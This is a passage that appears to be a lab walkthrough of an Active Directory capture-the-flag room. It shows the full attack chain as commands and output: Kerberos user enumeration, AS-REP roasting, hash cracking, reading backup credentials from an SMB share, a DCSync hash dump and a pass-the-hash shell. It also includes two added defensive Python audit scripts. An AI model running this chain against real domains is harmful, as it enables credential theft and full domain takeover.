The document outlines a penetration testing setup for an Active Directory environment, detailing the installation of tools like Impacket, Bloodhound, and EvilWinRM. It includes steps for enumeration using Nmap and Kerbrute, revealing valid usernames and methods for exploiting Kerberos vulnerabilities. The document concludes with successful credential extraction and access to the system using the Evil-WinRM tool.

Uploaded by

popliobli
Attacktive Directory

export IP=10.10.192.109

Setup
Impacket requires python version >=3.7.
sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket
sudo pip3 install -r /opt/impacket/requirements.txt
cd /opt/impacket/
sudo pip3 install .
sudo python3 setup.py install
Bloodhound and Neo4j
sudo apt install bloodhound neo4j
Kerbrute: brute force discovery of users, passwords and even password spray!
https://github.com/ropnop/kerbrute/releases
EvilWinRM
https://github.com/Hackplayers/evil-winrm

Enum
nmap
root@ip-10-10-47-56:~/AttacktiveDir# nmap -sC -sV 10.10.192.109 -oN nmap.initial

Starting Nmap 7.60 ( https://nmap.org ) at 2023-06-25 17:09 BST


Stats: 0:00:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 71.83% done; ETC: 17:10 (0:00:15 remaining)
Nmap scan report for ip-10-10-192-109.eu-west-1.compute.internal (10.10.192.109)
Host is up (0.00041s latency).
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-06-25 16:10:40Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
445/tcp open microsoft-ds?

464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.loca
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2023-06-24T16:06:44
|_Not valid after: 2023-12-24T16:06:44
|_ssl-date: 2023-06-25T16:10:46+00:00; 0s from scanner time.
MAC Address: 02:52:FA:48:EB:61 (Unknown)
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:


|_nbstat: NetBIOS name: ATTACKTIVEDIREC, NetBIOS user: <unknown>, NetBIOS MAC: 02:52:fa:48:e
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2023-06-25 17:10:46
|_ start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/


Nmap done: 1 IP address (1 host up) scanned in 105.10 seconds
enum4linux
enum4linux 10.10.192.109

Abusing Kerberos
kerbrute
User list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
Password list: https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt
> The user and password lists are specific to this room; normally brute forcing is not recommended because of account lockout.
root@ip-10-10-47-56:~/AttacktiveDir# ./kerbrute_linux_amd64 userenum --dc 10.10.192.109 -d s

__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 06/25/23 - Ronnie Flathers @ropnop

2023/06/25 17:39:47 > Using KDC(s):
2023/06/25 17:39:47 > 10.10.192.109:88

2023/06/25 17:40:20 > Done! Tested 73317 usernames (16 valid) in 33.641 seconds
We can attack with AS-REP roasting. AS-REP roasting is possible when a user
account has the privilege "Does not require Pre-Authentication" set. This means
that the account does not need to provide valid identification before requesting
a Kerberos ticket for that user account.

Retrieving Kerberos tickets: GetNPUsers.py (located in impacket/examples/GetNPUsers.py)
allows us to query AS-REP roastable accounts from the Key Distribution Center.
All that is necessary to query accounts is a valid set of usernames.
root@ip-10-10-47-56:~/AttacktiveDir# python3.9 /opt/impacket/examples/GetNPUsers.py -no-pass
Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

[*] Getting TGT for svc-admin


[email protected]:5da54054107c7568f46b52473942dfa3$8c860941f70266326ca
We got a ticket without a password.
hashcat
hashcat -m 18200 hash.txt passwordlist.txt
-m 18200 = Kerberos 5 AS-REP etype 23
pass: management2005
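As an added defender-side example (not from the original writeup), the check an administrator runs to find the accounts this attack applies to: decode userAccountControl, list the enabled accounts with DONT_REQ_PREAUTH set, and build the LDAP filter that returns the same set from a DC. The sample account records and their flag values are constructed; the bit values themselves are Microsoft's documented userAccountControl flags.

```python
# Relevant userAccountControl bits (Microsoft's documented flag values).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "PASSWD_NOTREQD": 0x0020,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "DONT_REQ_PREAUTH": 0x400000,   # "Does not require Kerberos preauthentication"
}

def decode_uac(value):
    """Names of the tracked flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]

def asrep_roastable(accounts):
    """Enabled accounts with pre-authentication disabled: the KDC will return an
    AS-REP (with a part encrypted under the account's key) to anyone who asks,
    which is what GetNPUsers.py collects. Re-enabling pre-auth removes them."""
    return sorted(
        a["sAMAccountName"] for a in accounts
        if a["userAccountControl"] & UAC_FLAGS["DONT_REQ_PREAUTH"]
        and not a["userAccountControl"] & UAC_FLAGS["ACCOUNTDISABLE"]
    )

def ldap_filter():
    """LDAP filter using the bitwise-AND matching rule (OID 1.2.840.113556.1.4.803)
    so the same audit can be run directly against a domain controller."""
    return "(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=%d))" % (
        UAC_FLAGS["DONT_REQ_PREAUTH"]
    )

# Constructed sample: values as an LDAP query would return them (0x200 = NORMAL_ACCOUNT).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-admin", "userAccountControl": 0x400200},  # pre-auth disabled
    {"sAMAccountName": "backup", "userAccountControl": 0x10200},      # password never expires
    {"sAMAccountName": "oldsvc", "userAccountControl": 0x400202},     # pre-auth disabled, but account disabled
    {"sAMAccountName": "Guest", "userAccountControl": 0x10222},
]

if __name__ == "__main__":
    print("roastable:", asrep_roastable(SAMPLE_ACCOUNTS))
    print("query:", ldap_filter())
```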
smbclient

root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin -L 10.10.192.109
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:

Sharename Type Comment


--------- ---- -------
ADMIN$ Disk Remote Admin
backup Disk
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Connection to 10.10.192.109 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Failed to connect with SMB1 -- no workgroup available
smbclient
root@ip-10-10-47-56:~/AttacktiveDir# smbclient -U svc-admin \\\\10.10.192.109\\backup
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\svc-admin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Apr 4 20:08:39 2020
.. D 0 Sat Apr 4 20:08:39 2020
backup_credentials.txt A 48 Sat Apr 4 20:08:53 2020

8247551 blocks of size 4096. 3610988 blocks available

root@ip-10-10-47-56:~/AttacktiveDir# cat backup_credentials.txt


YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

root@ip-10-10-47-56:~/AttacktiveDir# base64 -d backup_credentials.txt


backup@spookysec.local:backup2517860
We got the backup password.
It is the backup account for the Domain Controller. This account has
a unique permission that allows all Active Directory changes to be synced
with this user account, and this includes password hashes.
Secretsdump
root@ip-10-10-47-56:~/AttacktiveDir# secretsdump.py -just-dc [email protected]

Impacket v0.10.1.dev1+20230316.112532.f0ac44bd - Copyright 2022 Fortra

Password:
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
.
.
.
Administrator's NTLM hash: 0e0363213e37b94221497260b0bcb4fc
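Added example, not part of the original writeup: a small audit over output in the secretsdump format shown above (domain\user:rid:lmhash:nthash:::) that flags blank passwords, accounts still storing an LM hash, and NT-hash reuse between accounts, the kind of hygiene issue that lets one recovered hash open several accounts. The sample lines are constructed, except that Administrator and Guest are the lines from the dump above.

```python
import re
from collections import defaultdict

# Well-known constants: the LM value stored when LM hashing is disabled, and the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One secretsdump -just-dc line: [domain\]user:rid:lmhash:nthash:::
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)

def parse_dump(text):
    """Keep only well-formed hash lines; [*] status lines and Kerberos keys are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows

def audit(rows):
    """Credential-hygiene findings a defender would act on after a DCSync-style dump."""
    findings = {"blank_password": [], "lm_stored": [], "shared_nt": {}}
    by_nt = defaultdict(list)
    for r in rows:
        if r["nt"] == EMPTY_NT:
            findings["blank_password"].append(r["user"])
        if r["lm"] != EMPTY_LM:
            findings["lm_stored"].append(r["user"])
        by_nt[r["nt"]].append(r["user"])
    # Accounts sharing one NT hash share a password: cracking or passing it opens all of them.
    findings["shared_nt"] = {nt: u for nt, u in by_nt.items() if len(u) > 1 and nt != EMPTY_NT}
    return findings

# Constructed sample. Administrator and Guest are the lines from the dump above;
# "reuser" and "legacyuser" are made up (legacyuser's hashes are those of "password").
SAMPLE = r"""[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
spookysec.local\reuser:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
spookysec.local\legacyuser:1700:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
[*] Kerberos keys grabbed
"""

if __name__ == "__main__":
    print(audit(parse_dump(SAMPLE)))
```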

Pass the Hash


root@ip-10-10-47-56:~/AttacktiveDir# evil-winrm -i 10.10.192.109 -u Administrator -H 0e03632

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami


thm-ad\administrator
